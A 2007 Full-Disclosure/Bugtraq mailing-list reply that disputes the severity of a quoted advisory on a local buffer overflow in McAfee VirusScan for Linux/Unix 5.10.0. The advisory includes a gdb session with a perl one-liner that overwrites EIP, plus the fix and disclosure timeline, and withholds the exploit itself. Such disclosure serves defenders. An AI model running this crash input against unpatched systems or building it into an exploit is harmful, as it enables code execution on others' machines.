Date: Wed, 15 Aug 2007 10:39:07 -0400
From: "Joey Mengele" <joey.mengele@...hmail.com>
To: <full-disclosure@...ts.grok.org.uk>, <bugtraq@...urityfocus.com>,
	<sebastian@...fgarten.com>
Subject: Re: McAfee Virus Scan for Linux and Unix v5.10.0
	Local Buffer Overflow

Where does security come into play here? This is a local crash in a 
non setuid binary. I would like to hear your remote exploitation 
scenario. Or perhaps your local privilege escalation scenario?

J

P.S. We all know this advisory is bullshit, you should have sold it 
to WabiSabiLabi LOLOLOL

On Wed, 15 Aug 2007 08:56:54 -0400 Sebastian Wolfgarten 
<sebastian@...fgarten.com> wrote:
>I - TITLE
>
>Security advisory: McAfee Virus Scan for Linux and Unix v5.10.0 Local Buffer Overflow
>
>II - SUMMARY
>
>Description: Local buffer overflow vulnerability in McAfee Virus Scan for Linux and Unix allows arbitrary code execution
>
>Author: Sebastian Wolfgarten (sebastian at wolfgarten dot com)
>
>Date: August 15th, 2007
>
>Severity: Low-Medium
>
>References: http://www.devtarget.org/mcafee-advisory-08-2007.txt
>
>III - OVERVIEW
>
>McAfee Virus Scan for Linux and Unix is a command-line version of the popular McAfee anti-virus scanner running on the Linux operating system as well as on other Unices (e.g. AIX, Solaris, HP-UX etc.). It was discovered that the product is prone to a classic buffer overflow vulnerability when attempting to scan files or directories with a particularly long name. This vulnerability results in the local execution of arbitrary code with the privileges of the user running the scanner; privilege escalation is by default not possible. Remote exploitation appears to be infeasible due to file length limitations in popular file systems.
>
>IV - DETAILS
>
>The overflow occurs when the product tries to scan a file or directory with a name that is longer than a certain size (approx. 4124+ bytes). For example on a Debian Linux 3.1 test system, it takes 4124+4 bytes to successfully overwrite the EIP register and thus execute arbitrary code:
>
># /usr/local/uvscan/uvscan --version
>Virus Scan for Linux v5.10.0
>Copyright (c) 1992-2006 McAfee, Inc. All rights reserved.
>(408) 988-3832  EVALUATION COPY - May 26 2006
>
>Scan engine v5.1.00 for Linux.
>Virus data file v4777 created Jun 05 2006
>Scanning for 194376 viruses, trojans and variants.
>
># gdb /usr/local/uvscan/uvscan
>GNU gdb 6.3-debian
>Copyright 2004 Free Software Foundation, Inc.
>GDB is free software, covered by the GNU General Public License, 
>and you
>are welcome to change it and/or distribute copies of it under 
>certain
>conditions. Type "show copying" to see the conditions. There is
>absolutely no warranty for GDB. Type "show warranty" for details. 
>This
>GDB was configured as "i386-linux"...(no debugging symbols found)
>Using host libthread_db library "/lib/tls/libthread_db.so.1".
>
>(gdb) run `perl -e 'print "A"x4124 . "B"x4'`
>Starting program: /usr/local/uvscan/uvscan `perl -e 'print "A"x4124 . "B"x4'`
>(no debugging symbols found)
>(no debugging symbols found)
>(no debugging symbols found)
>(no debugging symbols found)
>(no debugging symbols found)
>(no debugging symbols found)
>(no debugging symbols found)
>(no debugging symbols found)
>(no debugging symbols found)
>[Thread debugging using libthread_db enabled]
>[New Thread 1080238208 (LWP 2461)]
>(no debugging symbols found)
>
>Program received signal SIGSEGV, Segmentation fault.
>[Switching to Thread 1080238208 (LWP 2461)]
>0x42424242 in ?? ()
>(gdb) info registers
>eax            0x1      1
>ecx            0x8068430        134644784
>edx            0x1      1
>ebx            0x41414141       1094795585
>esp            0xbfffdc40       0xbfffdc40
>ebp            0x41414141       0x41414141
>esi            0x41414141       1094795585
>edi            0x41414141       1094795585
>eip            0x42424242       0x42424242
>eflags         0x282    642
>cs             0x73     115
>ss             0x7b     123
>ds             0x7b     123
>es             0x7b     123
>fs             0x0      0
>gs             0x33     51
>
>V - EXPLOIT CODE
>
>An exploit for this vulnerability has been developed but will not be released to the general public at this time.
>
>VI - WORKAROUND/FIX
>
>To address this problem, the vendor has released McAfee VirusScan Command Line Scanner for Linux and Unix version 5.20. Thus all users of the product are asked to test and install this patch as soon as possible. McAfee has also published a dedicated security bulletin that covers the problem (see
>https://knowledge.mcafee.com/SupportSite/dynamickc.do?externalId=613576&sliceId=SAL_Public&command=show&forward=nonthreadedKC&kcId=613576).
>
>
>VII - DISCLOSURE TIMELINE
>
>18. December 2006 - Notified security@...fee.com
>19. December 2006 - Vendor responded that vulnerability is being
>investigated
>19. December to 15. August 2007 - Weekly vendor report on the progress of the development of the patch
>01. August 2007 - Release of patch
>15. August 2007 - Public disclosure

